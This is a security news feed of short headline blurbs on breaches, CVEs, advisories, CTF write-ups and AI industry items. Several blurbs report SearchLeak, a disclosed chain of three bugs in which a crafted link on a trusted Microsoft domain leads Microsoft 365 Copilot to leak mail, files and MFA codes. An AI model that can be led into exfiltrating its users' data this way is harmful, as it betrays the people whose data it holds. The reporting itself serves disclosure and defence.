L'Actu de la presse spécialisée
The Government Just Made Our Case: Stop Fixing Everything, Fix What Matters.
CISA made risk-based prioritization federal policy. That's the problem we've been working on for years.
https://www.legitsecurity.com/blog/the-government-just-made-our-case-stop-fixing-everything-fix-what-matters
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
OptinMonster WordPress plugin hacked in CDN supply-chain attack
WordPress plugins OptinMonster, TrustPulse, and PushEngage have been compromised in a supply-chain attack impacting Awesome Motive-s content distribution network (CDN). [...]
https://www.bleepingcomputer.com/news/security/optinmonster-wordpress-plugin-hacked-in-cdn-supply-chain-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
NIS2 is raising the bar. Here's how to turn readiness into resilience.
The NIS2 directive asks covered organizations to take a more structured approach to risk management, governance, supply chain security, and incident reporting. It expands the scope of who may be covered, raises expectations around management body accountability, introduces clearer and more enforceable requirements, and increases pressure on organizations to show that security is being managed in a consistent, defensible way. Reporting timelines are one of the most visible parts of that shift, with early warning required within 24 hours of awareness for significant incidents, incident notification within 72 hours, and a final report within one month. It also arrived in a landscape that is still uneven, with member states continuing to implement the directive in different ways across the EU.That...
https://www.rapid7.com/blog/post/so-nis2-compliance-turn-readiness-into-resilience
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Does Your Security Programme Align With NIS2 Requirements?
If your organization operates in the EU, or works with organizations that do, NIS2 is no longer something on the horizon. It is here and it applies to a far wider range of sectors than its predecessor, the original NIS Directive (Directive (EU) 2016/1148), and it comes with real consequences for organizations that cannot demonstrate they are meeting its requirements. The good news? You do not have to figure out how to approach it alone.Rapid7 has developed a dedicated NIS2 resource page that shows how the Command Platform can support key technical and operational aspects of NIS2 readiness, highlights common security program gaps, and explains where our solutions can help strengthen visibility, prioritization, detection, and reporting readiness. It is not a substitute for the broader organizational,...
https://www.rapid7.com/blog/post/so-aligning-security-programmes-with-nis2-requirements
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-8431-1: Ruby vulnerabilities
It was discovered that Ruby's Net::IMAP library did not properly verify
that Transport Layer Security (TLS) encryption was started after issuing a STARTTLS command. A remote
attacker could possibly use this issue to perform a machine-in-the-middle attack and silently
bypass TLS encryption. (CVE-2026-42246)
It was also discovered that Ruby's Net::IMAP library did not validate
string arguments passed to certain commands. A remote attacker could possibly use this issue to
inject arbitrary IMAP commands. (CVE-2026-42257)
https://ubuntu.com/security/notices/USN-8431-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cisco fixes SD-WAN vManage flaw exploited in zero-day attacks
Cisco has released security updates to address a vulnerability in the Catalyst SD-WAN Manager, tracked as CVE-2026-20262, that was exploited in attacks to escalate to root privileges. [...]
https://www.bleepingcomputer.com/news/security/cisco-fixes-sd-wan-vmanage-flaw-exploited-in-zero-day-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
China-Nexus Actor Spy on US Researchers Undetected for a Year
Google discovered and disrupted the sprawling campaign, which stole RedCAP credentials to target numerous institutions and exfiltrate sensitive data.
https://www.darkreading.com/threat-intelligence/china-nexus-actor-us-researchers-undetected
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Microsoft Site Showing Warning Following Certificate Expiry
Microsoft seems to have failed certificate management after a domain used by sysadmins globally to test connectivity to Microsoft 365 started generating untrusted connection warnings in browsers on Monday. The connectivity.office.com domain a widely relied-upon tool for IT professionals to verify their network’s connectivity to Microsoft 365 and confirm that firewalls aren’t silently blocking critical […]
The post Microsoft Site Showing Warning Following Certificate Expiry appeared first on Cyber Security News.
https://cybersecuritynews.com/microsoft-certificate-expiry/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
LiteLLM Vulnerability Chain Lets Low-Privilege Users Take Over AI Gateway Servers
A default low-privilege account on a LiteLLM proxy can climb to full admin and run code on the server by chaining three vulnerabilities, researchers at Obsidian Security disclosed
LiteLLM is a widely deployed open-source AI gateway that brokers calls to more than 100 model providers behind one OpenAI-compatible interface.
A server takeover exposes every provider key it holds, the secrets that
https://thehackernews.com/2026/06/litellm-vulnerability-chain-lets-low.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Council of Europe investigates ShinyHunters data breach claims
The Council of Europe, the continent's oldest intergovernmental body, is probing claims of a data breach made by the ShinyHunters extortion group over the weekend. [...]
https://www.bleepingcomputer.com/news/security/council-of-europe-investigates-shinyhunters-data-breach-claims/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
DPAPISnoop Tool Extracts CREDHIST Hashes for Offline Windows Credential Recovery
The open-source DPAPISnoop tool has been enhanced to extract CREDHIST entries, enabling offline cracking of historical Windows credentials and deeper insight into password patterns. Lefteris Panos, Security Consultant at LRQA Red Team, said the update adds CREDHIST extraction capabilities to DPAPISnoop, enabling the recovery and analysis of historical Windows credentials alongside DPAPI Master Key hashes. […]
The post DPAPISnoop Tool Extracts CREDHIST Hashes for Offline Windows Credential Recovery appeared first on Cyber Security News.
https://cybersecuritynews.com/dpapisnoop-tool-extracts-credhist-hashes/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
SHADOWBYT3$ Allegedly Claim Breach of Nintendo, Stealing Sensitive Data
Threat intelligence sources have reported that the threat actor group SHADOWBYT3$ has allegedly breached Nintendo, claiming to have exfiltrated approximately 859 MB of sensitive internal data. The incident, first observed on June 13, 2026, remains unverified at the time of writing. However, early details suggest potential exposure of employee-related information. The alleged breach is linked […]
The post SHADOWBYT3$ Allegedly Claim Breach of Nintendo, Stealing Sensitive Data appeared first on Cyber Security News.
https://cybersecuritynews.com/shadowbyt3-claim-breach-of-nintendo/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Microsoft Defender email security benchmarking: Key insights from one year of data
See how Microsoft Defender performed in one year of real-world email security benchmarking against SEG and ICES vendors.
The post Microsoft Defender email security benchmarking: Key insights from one year of data appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2026/06/15/microsoft-defender-email-security-benchmarking-key-insights-from-one-year-of-data/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
FBI: Fraudsters use couriers to steal money in crypto scams
The U.S. Federal Bureau of Investigation (FBI) warned that criminals are using couriers to collect money from victims of cryptocurrency investment scams, also known as pig butchering or romance baiting. [...]
https://www.bleepingcomputer.com/news/security/fbi-fraudsters-use-couriers-to-steal-money-in-crypto-scams/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
My Instructor Said “You Can't Get a Shell.” I Got Root. — Full Web Pentest Exam Write-Up
Author: Shikhali JamalzadeGitHub: github.com/alisalive LinkedIn: linkedin.com/in/camalzadsDisclosure Notice: This assessment was conducted as a formal practical examination under the supervision of MilliSec LLC. The target applicationVanguardCorp Hotel Management System — was a purpose-built CTF/exam environment deployed specifically for this assessment on May 24, 2026. No real user data was involved. All exploitation was performed within an isolated lab network. This write-up is published strictly for educational purposes.The SetupBefore the exam started, my instructor — the person who built the target application from scratch — looked me in the eye and said:“You can't get a shell from this site. I haven't left that kind of vulnerability.”5 minutes later, I had...
https://infosecwriteups.com/my-instructor-said-you-cant-get-a-shell-i-got-root-full-web-pentest-exam-write-up-a82c804ce8e2?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Connectors CTF 2025 — DFIR Challenges
Connectors CTF 2025 — DFIR ChallengesHappy to share my write-up for solving 3/3 DFIR challenges from CONCTF 2025. Although I didn't attend the finals, I successfully completed all the DFIR challenges independently.You can read this writeup on my GitBook account Linkwe got a malicious document file, have macros and other stuff.first step is to extract the document file “Invoice_Q1–2021.doc” as any other zip, rar file:and so on. after extracting the file, we can view all malicious stuff.starting with “Invoice_Q1–2021\word\vbaData.xml” file, we can get the full MacroName, which is “PROJECT.AYAIQ5.AUTOOPEN”moving on another “Invoice_Q1–2021\word\document.xml” we can see a lot of malicious stuff, that needs more investigation:<w:t><html><body><div...
https://infosecwriteups.com/connectors-ctf-2025-dfir-challenges-6d66c31cce9a?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Silent Breach Lab Writeup (CyberDefenders)
Silent Breach | Blue team challenge.You can read this writeup on my GitBook account LinkScenarioThe IMF is hit by a cyber attack compromising sensitive data. Luther sends Ethan to retrieve crucial information from a compromised server. Despite warnings, Ethan downloads the intel, which later becomes unreadable. To recover it, he creates a forensic image and asks Benji for help in decoding the files.Resources:Windows Mail Artifacts: Microsoft HxStore.hxd (email) ResearchQ1: What is the MD5 hash of the potentially malicious EXE file the user downloaded?After opening the downloaded artifacts file with FTK Imager, we are for an executable “.exe” file that seems malicious.We can see a malicious file in “/Downloads” called “IMF-Info.pdf.exe”.pdf.exe !!!!!!Of course it's not a normal...
https://infosecwriteups.com/silent-breach-lab-writeup-cyberdefenders-c766dc7a9acb?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Anthropic Updated Privacy Policy to Include Identity Verification for Claude Users
Anthropic has updated its privacy policy for Claude, adding explicit terminology that allows the company to perform age and identity verification on consumer users. The change signals a tighter security and compliance stance across Claude Free, Pro, and Max plans. It is scheduled to take effect on July 8, 2026. In the revised policy, Anthropic […]
The post Anthropic Updated Privacy Policy to Include Identity Verification for Claude Users appeared first on Cyber Security News.
https://cybersecuritynews.com/anthropic-updated-privacy-policy/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Meet Meshy: HackerNoon Company of the Week
Meshy is the leading AI 3D model generator with 10M+ users and 100M+ models generated. Featured as HackerNoon's Company of the Week, June 2026.
https://hackernoon.com/meet-meshy-hackernoon-company-of-the-week?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
One-Click Microsoft 365 Copilot Flaw Could Have Let Attackers Steal Emails, Files, and MFA Codes
A single click on a trusted Microsoft link could have let an attacker pull emails, calendar details, and indexed files out of Microsoft 365 Copilot Enterprise Search.
Researchers at Varonis Threat Labs chained three bugs into a one-click exfiltration path they call SearchLeak. Because the link pointed to a real microsoft.com domain, traditional anti-phishing and URL filtering tools were
https://thehackernews.com/2026/06/one-click-microsoft-365-copilot-flaw.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Beginning of the End of Social Engineering
AI-native operating systems are shifting the responsibility to stay vigilant against social engineering cyberattacks from the user onto the system itself.
https://www.darkreading.com/cyberattacks-data-breaches/beginning-end-social-engineering
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Critical Microsoft 365 Copilot Vulnerability Allows Attackers to Steal Data in One Click
A critical vulnerability chain in Microsoft 365 Copilot Enterprise that let attackers steal sensitive corporate data, MFA codes, email contents, calendar details, and confidential files with nothing more than a single click on a link pointing to a legitimate Microsoft domain. Dubbed SearchLeak, uncovered by Varonis Threat Labs and tracked as CVE-2026-42824, the flaw earned […]
The post Critical Microsoft 365 Copilot Vulnerability Allows Attackers to Steal Data in One Click appeared first on Cyber Security News.
https://cybersecuritynews.com/microsoft-365-copilot-one-click-vulnerability/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
PDFSharp C# Review: Useful, Lightweight, but Limited in Scope
PDFSharp is stronger in 2026, with signatures, PDF/A, and PDF/UA support — but HTML rendering and rasterization remain outside its scope.
https://hackernoon.com/pdfsharp-c-review-useful-lightweight-but-limited-in-scope?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Anatomy of a Critical SQL Injection: Lessons From CVE-2020-24932
CVE-2020-24932 was a critical SQL injection vulnerability in Complaint Management System v1.0 that stemmed from directly embedding user input into a database query. This article examines the root cause, disclosure timeline, impact, and remediation strategies, while highlighting how insecure tutorial code can propagate into real-world deployments.
https://hackernoon.com/anatomy-of-a-critical-sql-injection-lessons-from-cve-2020-24932?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Beyond the Score: Using AI to Translate CVEs into Real-World Business Risk
Security leaders rarely struggle to gather data, but they often struggle to turn that data into something clear and meaningful for the business. In a typical week, a CISO might receive a report listing hundreds or even thousands of vulnerabilities, most of them accompanied by CVSS scores that make the entire list look urgent, while also managing the wider set of operational, regulatory, and strategic demands that already come with the role.That difficulty becomes more obvious when the same information has to be carried into the boardroom, where the questions are rarely about CVE IDs or exploit counts in isolation. What leadership wants to understand is whether the organization's revenue, uptime, legal exposure, or broader resilience could be affected, and how quickly those risks need to...
https://www.rapid7.com/blog/post/ai-beyond-the-score-translating-cves-into-real-business-risk
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Designing Guardrails for AI Agents That Spend
Real Money
Agent-initiated payments are moving into production through frameworks such as Stripe and OpenAI's Agentic Commerce Protocol and Google's AP2. As software gains authority to spend on behalf of users and organizations, the key challenge shifts from authentication to governance. This article explores the controls, guardrails, liability concerns, and delegation frameworks needed to make autonomous payments trustworthy and auditable.
https://hackernoon.com/designing-guardrails-for-ai-agents-that-spend-real-money?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Claude Fable 5 and Mythos 5 “abruptly disabled” after US gov. ban
Anthropic has been ordered by the US government to cut off its newest Claude Fable 5 and Mythos 5 models for fear of abuse.
https://www.malwarebytes.com/blog/ai/2026/06/claude-fable-5-and-mythos-5-abruptly-disabled-after-us-gov-deems-them-too-clever
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Deepfake porn sites are going offline (re-air) (Lock and Code S07E12)
This week on the Lock and Code podcast, we revisit an episode from 2024 with David Chiu that shows the progress made against deepfake porn.
https://www.malwarebytes.com/blog/podcast/2026/06/deepfake-porn-sites-are-going-offline-re-air-lock-and-code-s07e12
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Anterra Capital Reaches 0M First Close for Fund III to Back AI in the T Food Industry
Anterra Capital announced a 0 million first close on Fund III in June 2026, targeting 0 million, with backing from Rabobank, Novo Holdings, and Zoetis among others.
Anterra Capital is a specialist food and agriculture venture firm founded in Amsterdam in 2013, with offices in Amsterdam and Boston, managing over 0 million across three funds.
Anterra builds companies from scratch in addition to backing them; its company creation Invetx was founded in 2018 and sold to Dechra Pharmaceuticals for up to 0 million within six years.
Anterra's company creation Enko Chem, founded in 2017, develops new crop protection chemistry to replace glyphosate, with research partnerships with Bayer and Syngenta.
Global agrifoodtech venture funding peaked at .7 billion in 2021 before falling to...
https://hackernoon.com/anterra-capital-reaches-0m-first-close-for-fund-iii-to-back-ai-in-the-t-food-industry?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Scaling AI Inference on Kubernetes: The Case for Token-Based Autoscaling
HPA scales on request count - but LLM requests aren't equal. A 200-token prompt and an 8,000-token doc hit your GPU completely differently. Scale on token throughput ratio instead, wire it into a custom HPA metric, and rewrite your SLOs around p95 TTFT. Your GPU utilization will thank you.
https://hackernoon.com/scaling-ai-inference-on-kubernetes-the-case-for-token-based-autoscaling?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vibe coders are gonna vibe code: How CISOs are tackling code sprawl
Employees are increasingly building automations, agents, and apps with AI tools outside traditional security oversight. Tines explores how CISOs are handling AI-driven code sprawl, shadow tooling, and governance challenges. [...]
https://www.bleepingcomputer.com/news/security/vibe-coders-are-gonna-vibe-code-how-cisos-are-tackling-code-sprawl/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The TechBeat: I Shipped 50 AI-Generated 3D Assets Into a Unity URP Pipeline. Here's What Actually Held Up. (6/15/2026)
How are you, hacker?
🪐Want to know what's trending right now?:
The Techbeat by HackerNoon has got you covered with fresh content from our trending stories of the day! Set email preference here.
## Vibe Coding Ends at Localhost
By @dmytrochervonyi [ 7 Min read ]
AI coding agents got brilliant at writing code and stayed useless at deploying it. The reason isn't intelligence — it's that deployment breaks the feedback loop Read More.
What is the A.G.E.N.T.I.C. Framework?
By @sultan-ssh [ 8 Min read ]
What is the A.G.E.N.T.I.C. Framework? A seven-phase methodology for earning brand visibility and sales across AI search and agentic commerce. Read More.
I Shipped 50 AI-Generated 3D Assets Into a Unity URP Pipeline. Here's What Actually Held Up.
By @marcus_chenn [ 7 Min read ]
...
https://hackernoon.com/6-15-2026-techbeat?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
163 Blog Posts To Learn About Seo Tips
Let's learn about Seo Tips via these 163 free blog posts. They are ordered by HackerNoon reader engagement data. Visit the Learn Repo or LearnRepo.com to find the most read blog posts about any technology.
SEO tips are practical recommendations and strategies designed to improve a website's visibility and ranking in search engine results. Implementing these tips helps businesses attract more organic traffic, increasing their online presence and potential customer reach.
1. Will Guest Posting Still be a Good SEO Strategy in 2023?
This article will examine when and why guest posting is a good idea. We will also cover some Guest Posting tips to help you get the most out of this strategy.
2. Why You Must Use Next.js to Get the Benefits of React
3. The Best SEO is No SEO
Always take content...
https://hackernoon.com/163-blog-posts-to-learn-about-seo-tips?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Chinese hackers breach REDCap servers, steal medical research
A China-linked espionage campaign targeted exposed REDCap servers to deploy the InfiniteRed malware and steal sensitive data from a medical institution in North America. [...]
https://www.bleepingcomputer.com/news/security/chinese-hackers-breach-redcap-servers-steal-medical-research/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
⚡ Weekly Recap: Chrome 0-Day, UniFi Exploits, macOS Stealers, VPN Flaw and More
Stuff broke again. Not in a movie way. An old tool was left exposed. An abandoned package was abused. A deprecated feature was still running in prod.
This week is the same lesson in a new form: phishing kits are easier to rent, AI names are useful bait, old login paths still fail, and forgotten software keeps becoming someone else's entry point.
Scroll through the full Monday Cybersecurity
https://thehackernews.com/2026/06/weekly-recap-chrome-0-day-unifi.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Feds Seize CFAKE and SOCFAKE Over Explicit Deepfakes of Famous Women
Both CFAKE and SOCFAKE (CFAKE.com and SOCFAKE.com) were seized after prosecutors said they hosted nonconsensual nude digital forgeries of famous women.
https://hackread.com/feds-seize-cfake-and-socfake-explicit-deepfakes-women/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Whisper Is Free and It's Good. Here's Why We Still Beat It.
Whisper is free, runs locally, and genuinely good. So what happens when you benchmark your paid on-device speech model against it? We did exactly that — and the memory numbers surprised us more than the speed. Plus why audio transformers break quantization tools that work fine on LLMs, and the honest cases where Whisper still wins.
https://hackernoon.com/whisper-is-free-and-its-good-heres-why-we-still-beat-it?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Million-Dollar Blind Spot: Why Traditional Finance Can't Track Product ROI
Traditional corporate accounting treats technology infrastructure like a static utility bill, which completely hides its true impact on revenue expansion. To fix this blind spot, modern engineering organizations must connect low-level operational telemetry—like unit cost behavior, latency metrics and resource tags—directly into their financial models to treat technology as a measurable, scalable asset.
https://hackernoon.com/the-million-dollar-blind-spot-why-traditional-finance-cant-track-product-roi?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
awk: The Unix Tool That Thinks in Columns and Conditions
awk is the tool that does what grep, cut, and sort cannot do alone — filter by field value, perform arithmetic, count with associative arrays, and format output, all in one pass. This article covers how awk thinks, every practical flag and built-in variable, and real security patterns, including UID 0 detection, HTTP status filtering, brute-force source ranking, and exfiltration hunting in access logs.
https://hackernoon.com/awk-the-unix-tool-that-thinks-in-columns-and-conditions?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Architecture of Local-First AI Memory: No Cloud, No Keys, No Read-Time LLMs
PMB is a local-first memory system for AI agents that stores knowledge in SQLite and LanceDB, avoids LLM calls on the read path, and prioritizes fast, deterministic retrieval. This article explores the storage model, asynchronous write path, hybrid retrieval architecture, memory lifecycle management, and the design principles behind persistent agent memory that remains fully under user control.
https://hackernoon.com/the-architecture-of-local-first-ai-memory-no-cloud-no-keys-no-read-time-llms?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cybercrime is Accelerating: Preparing the Next Wave of Cybersecurity Experts
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Jun. 15, 2026 – Read the full story from CMBlog By harnessing AI, cybercriminals are developing increasingly sophisticated techniques to commit their crimes, posing a growing threat to businesses, institutions, and individuals worldwide.
The post Cybercrime is Accelerating: Preparing the Next Wave of Cybersecurity Experts appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/cybercrime-is-accelerating-preparing-the-next-wave-of-cybersecurity-experts/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Novo Nordisk Confirms Data Theft: What Attackers Took and What They Didn't
Novo Nordisk suffered a cyberattack where clinical trial data was copied. The breach is confirmed, but no threat actor has claimed responsibility. The Danish pharmaceutical giant Novo Nordisk disclosed a cybersecurity breach that resulted in unauthorized access to internal IT systems and the theft of personal data. The company sells some of the most in-demand […]
https://securityaffairs.com/193650/security/novo-nordisk-confirms-data-theft-what-attackers-took-and-what-they-didnt.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Hackers Use Microsoft Graph Reconnaissance to Target Payroll and HR Employees
Hackers are using Microsoft’s own cloud tools to quietly hunt down payroll and HR staff inside corporate networks, then reroute employee salaries to accounts they control. Security teams are racing to respond as the campaign continues to spread across industries and borders. The attack method is deceptively clean. Instead of planting malware or exploiting software […]
The post Hackers Use Microsoft Graph Reconnaissance to Target Payroll and HR Employees appeared first on Cyber Security News.
https://cybersecuritynews.com/hackers-use-microsoft-graph-reconnaissance/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-8428-1: tmux vulnerability
It was discovered that tmux incorrectly handled image cleanup, leading to
a use-after-free vulnerability. A local attacker could possibly use this
issue to cause tmux to crash, resulting in a denial of service.
https://ubuntu.com/security/notices/USN-8428-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
New attack turned Microsoft 365 Copilot into 1-click data theft tool
A critical vulnerability chain dubbed SearchLeak in Microsoft 365 Copilot Enterprise could allow attackers to steal sensitive data from a target's mailbox, OneDrive, or SharePoint account through a specially crafted URL. [...]
https://www.bleepingcomputer.com/news/security/new-attack-turned-microsoft-365-copilot-into-1-click-data-theft-tool/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-8398-3: nginx vulnerability
USN-8398-1 fixed a vulnerability in nginx. The update caused a regression
and was temporarily reverted in USN-8398-2. This update introduces a
complete fix for CVE-2026-49975.
We apologize for the inconvenience.
Original advisory details:
It was discovered that nginx incorrectly handled certain cookie headers in
the HTTP/2 implementation. A remote attacker could possibly use this issue
to cause nginx to consume excessive resources, resulting in a denial of
service.
https://ubuntu.com/security/notices/USN-8398-3
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
China-Nexus Hackers Use Backdoored PAM Modules for Credential Theft and Authentication Bypass
A sophisticated China-linked threat actor known as Velvet Ant has been running a long-term cyber intrusion inside a major organization’s internal network, going undetected for nearly a decade. The campaign, now called Operation Highland, revealed a level of patience and technical depth rarely seen in publicly documented intrusions. What made this attack particularly alarming was […]
The post China-Nexus Hackers Use Backdoored PAM Modules for Credential Theft and Authentication Bypass appeared first on Cyber Security News.
https://cybersecuritynews.com/china-nexus-hackers-use-backdoored-pam-modules/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Infinite Campus data breach affects 137,000 school staff accounts
The ShinyHunters extortion gang stole personal information from more than 137,000 school staff accounts in a Salesforce data theft attack that targeted the widely used Infinite Campus K-12 student information system in March. [...]
https://www.bleepingcomputer.com/news/security/infinite-campus-data-breach-affects-137-000-school-staff-accounts/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
US Cracks Down on Anthropic AI Models Amid Abuse Concerns
Anthropic abruptly suspended all access to Fable 5 and Mythos 5 after receiving an export control directive that banned foreign nationals from using the technology.
https://www.darkreading.com/cyber-risk/us-cracks-down-anthropic-ai-models-abuse-concerns
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
SearchJack Campaign Uses 23 Chrome Extensions to Hijack Searches of 758,000 Users
A coordinated campaign of 23 deceptive Chrome browser extensions has been quietly stealing users’ search queries and routing them through hidden revenue systems. The operation, now dubbed SearchJack, has affected roughly 758,000 Chrome users worldwide without any of them realizing their searches were being hijacked. Each extension presents itself as a useful tool, from satellite […]
The post SearchJack Campaign Uses 23 Chrome Extensions to Hijack Searches of 758,000 Users appeared first on Cyber Security News.
https://cybersecuritynews.com/searchjack-campaign-uses-23-chrome-extensions/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Webinar: How behavioral AI stops phishing and account takeovers
Modern phishing, BEC, and account takeover attacks increasingly bypass traditional email defenses and create operational strain for security teams. This webinar explores how behavioral AI can help automate detection, investigation, and remediation to reduce alert fatigue and accelerate response times. [...]
https://www.bleepingcomputer.com/news/security/webinar-how-behavioral-ai-stops-phishing-and-account-takeovers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-8405-2: CUPS regression
USN-8405-1 fixed vulnerabilities in CUPS. The update introduced a
regression that cause CUPS to crash when parsing certain large printer PPD
files. This update fixes the problem.
Original advisory details:
Ariel Silver discovered that CUPS incorrectly handled username comparisons
during authorization checks. A local attacker could possibly use this issue
to gain unauthorized access to restricted operations. (CVE-2026-27447)
Asim Viladi Oglu Manizada discovered that CUPS incorrectly handled
notify-recipient-uri values in the RSS notifier. A remote attacker could
possibly use this issue to overwrite lp-writable files and cause a denial
of service. (CVE-2026-34978)
Jacob Newman discovered that CUPS incorrectly handled filter option strings
when processing job attributes. An attacker...
https://ubuntu.com/security/notices/USN-8405-2
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Handala Hacking Group Claims Breach of California Water Service
The Handala hacking group claims it has targeted California Water Service, leaking 5GB of customer database and GPS network files in its latest infrastructure attack.
https://hackread.com/handala-hacking-group-california-water-service-breach/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-8427-1: Mesa vulnerability
It was discovered that Mesa did not properly validate memory allocation
sizes in WebGPU under certain circumstances. An attacker could use this
issue to cause Mesa to crash, resulting in a denial of service, or possibly
execute arbitrary code.
https://ubuntu.com/security/notices/USN-8427-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
PromptSnatcher Ad Blocker Extensions Steal AI Chats From ChatGPT, Claude, and Gemini
Two browser extensions masquerading as ad blockers have been caught secretly recording private conversations from ChatGPT, Claude, Gemini, and five other major AI platforms. The extensions, named “Smart Adblocker” and “Adblock for Browser,” were installed by roughly 90,000 users before the scheme was uncovered. Users genuinely received ad-blocking functionality while their most sensitive AI conversations […]
The post PromptSnatcher Ad Blocker Extensions Steal AI Chats From ChatGPT, Claude, and Gemini appeared first on Cyber Security News.
https://cybersecuritynews.com/promptsnatcher-ad-blocker-extensions-steal-ai-chats/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Onboarding Password Mistake That Creates Unnecessary Risk
Employee onboarding is a busy time for IT teams. New starters need devices, accounts, access permissions, and passwords, all delivered within a tight timeframe.
That usually means sharing a temporary "first-day" password so employees can access systems for the first time. The issue is that these passwords don't always stay temporary. They may be sent over email or SMS, reused across accounts,
https://thehackernews.com/2026/06/the-onboarding-password-mistake-that.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Palo Alto Warns of Exploitation of VPN Bypass Exploits (CVE-2026-0257) in PAN-OS Flaw
Palo Alto Networks warns that attackers are actively exploiting CVE-2026-0257, a PAN-OS flaw that lets unauthorized users bypass authentication and establish VPN connections. Palo Alto Networks has confirmed active exploitation of CVE-2026-0257, a PAN-OS authentication bypass vulnerability affecting GlobalProtect portals and gateways. Palo Alto Networks addressed the vulnerability on May 13. Two weeks later, cybersecurity firm Rapid7 […]
https://securityaffairs.com/193638/security/palo-alto-warns-of-exploitation-of-vpn-bypass-exploits-cve-2026-0257-in-pan-os-flaw.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
152 Chrome Wallpaper Extensions with 105K Installs Linked to Adware and Fake Traffic
Cybersecurity researchers have discovered a network of 152 Google Chrome extensions that act as new tab live wallpaper add-ons to distribute a potentially unwanted program (PUP) family.
The cluster spans 38 separate Chrome Web Store publisher accounts and three brand backends: tabplugins[.]com, yowgames[.]com, and chromewallpaper[.]com. They have been collectively installed 105,000 times. The
https://thehackernews.com/2026/06/152-chrome-wallpaper-extensions-with.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Hackers Abuse LNK Files, PowerShell, and Python Loader to Deploy NarwhalRAT
A sophisticated malware campaign is quietly targeting Korean users through a well-crafted chain of deception. Threat actors are using innocent-looking shortcut files, built-in Windows tools, and a compiled Python payload to plant a remote access trojan called NarwhalRAT on victim machines. The attack stands out for how cleverly it blends into normal system activity, making […]
The post Hackers Abuse LNK Files, PowerShell, and Python Loader to Deploy NarwhalRAT appeared first on Cyber Security News.
https://cybersecuritynews.com/powershell-and-python-loader-to-deploy-narwhalrat/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Over 50 Android Apps Found Spreading MagicAd Trojan via Official Stores
Over 50 Android apps on official stores spread MagicAd trojan, using system tricks to force background ads even after infected apps are closed.
https://hackread.com/android-apps-magicad-trojan-official-stores/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Popular WordPress Plugin Scripts Tampered to Plant Hidden Backdoors on Sites
An attacker tampered with trusted JavaScript files used by WordPress sites running PushEngage, OptinMonster, and TrustPulse, turning those files into a way to break into the sites.
When a site administrator was logged in as the file loaded, the code created an admin account under the attacker's control and installed a hidden plugin that opened a way back in. Ordinary visitors did not trigger it
https://thehackernews.com/2026/06/popular-wordpress-plugin-scripts.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Supply Chain Attack Hits Popular WordPress Plugins Through Awesome Motive CDN
Attackers compromised Awesome Motive CDN files, backdooring WordPress sites running OptinMonster, TrustPulse, and PushEngage. Sansec researchers discovered an active supply chain attack hitting WordPress sites running OptinMonster, TrustPulse, and PushEngage, three plugins operated by Awesome Motive, one of the largest WordPress plugin companies in the world. The malicious JavaScript wasn’t sitting on any victim’s server. […]
